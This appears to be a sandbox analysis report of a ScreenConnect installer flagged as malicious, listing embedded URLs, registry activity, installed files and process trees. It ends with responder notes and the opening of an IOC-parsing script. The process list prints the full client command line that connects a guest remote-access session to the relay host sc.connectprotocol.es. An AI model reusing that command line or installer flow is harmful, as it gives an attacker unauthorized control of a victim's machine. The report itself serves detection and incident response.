Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                  Source: edb.log.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

                                  Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                  System Summary

Source: f53WqfzzNt.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_05222930 CreateProcessAsUserW
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\4ec95f.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{14C6E684-39F9-9C17-EDF7-878C827CA860}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICBE0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICBF0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICFCA.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\4ec961.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\4ec961.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{14C6E684-39F9-9C17-EDF7-878C827CA860}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{14C6E684-39F9-9C17-EDF7-878C827CA860}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{14C6E684-39F9-9C17-EDF7-878C827CA860}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\p3h3t4kq.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\p3h3t4kq.newcfg
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSICBF0.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_05220040
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Code function: 7_2_05220040
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B2F7008
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B2F10D7
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B2F10CF
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B302497
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B606AD6
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B607193
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B607CF8
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B609388
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B609378
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B60BC01
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B60A53F
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2E7008
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2E10D7
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B2E10CF
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B602859
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F2C00
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5FF012
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F5E90
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5FE266
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F6BB9
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F6319
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F613D
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Code function: 10_2_00007FFD9B5F6D39
Source: f53WqfzzNt.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: f53WqfzzNt.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: f53WqfzzNt.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: f53WqfzzNt.exe | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: f53WqfzzNt.exe | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: f53WqfzzNt.exe, 00000000.00000002.1744890990.0000000005740000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSfxCA.dllL vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamelibwebp.dllB vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1745193250.0000000005800000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1726310200.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsiexec.exe.muiX vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1726310200.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1729382795.0000000004314000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.000000000144F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.000000000144F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1760203980.0000000007C68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1760203980.0000000007C68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSfxCA.dllL vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1760203980.0000000007C68000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibwebp.dllB vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe, 00000000.00000002.1727327219.0000000001720000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenamelibwebp.dllB vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenamezlib.dll2 vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameSfxCA.dllL vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenamewixca.dll\ vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs f53WqfzzNt.exe
Source: f53WqfzzNt.exe | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.f53WqfzzNt.exe.5800000.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.f53WqfzzNt.exe.f263d4.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal46.evad.winEXE@18/59@1/2
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f53WqfzzNt.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: f53WqfzzNt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: f53WqfzzNt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: f53WqfzzNt.exe | ReversingLabs: Detection: 26%
Source: f53WqfzzNt.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: f53WqfzzNt.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | File read: C:\Users\user\Desktop\f53WqfzzNt.exe
Source: unknown | Process created: C:\Users\user\Desktop\f53WqfzzNt.exe "C:\Users\user\Desktop\f53WqfzzNt.exe"
Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 C
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13E
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=GOLDEN-TEAM-001"
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System"
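The ScreenConnect.ClientService.exe command line above carries everything a responder needs to identify this ScreenConnect instance: the relay host (h=sc.connectprotocol.es) and port (p=8041, the non-standard port the report flags), a session id (s), the server's public key (k) and a free-text label (t=GOLDEN-TEAM-001). The same 16-hex value, a532d472f1ff1d4e, names both the temporary MSI directory and the "ScreenConnect Client (...)" install directory, so it is a third pivot. Once %-decoded, k is a base64 Microsoft CryptoAPI PUBLICKEYBLOB; its first 20 bytes decode to bType 0x06, aiKeyAlg 0xA400 (CALG_RSA_KEYX), the magic "RSA1", a 2048-bit length and the exponent 65537. The script below is an added example, not code from the report or from ScreenConnect: it parses that argument string (copied verbatim as constructed input), decodes the key blob and hashes it, so the key can be used as an indicator for the same server even when host, port or label change between installers. The meanings assigned to e, y, h, p, s, k and t are my reading of the ScreenConnect client's parameter conventions, not something the report states.

```python
"""Extract IOCs from a ScreenConnect client command line and decode its server key.

Added example for this report; it is not code from Joe Sandbox or from ScreenConnect.
"""
import base64
import hashlib
import struct
from urllib.parse import unquote

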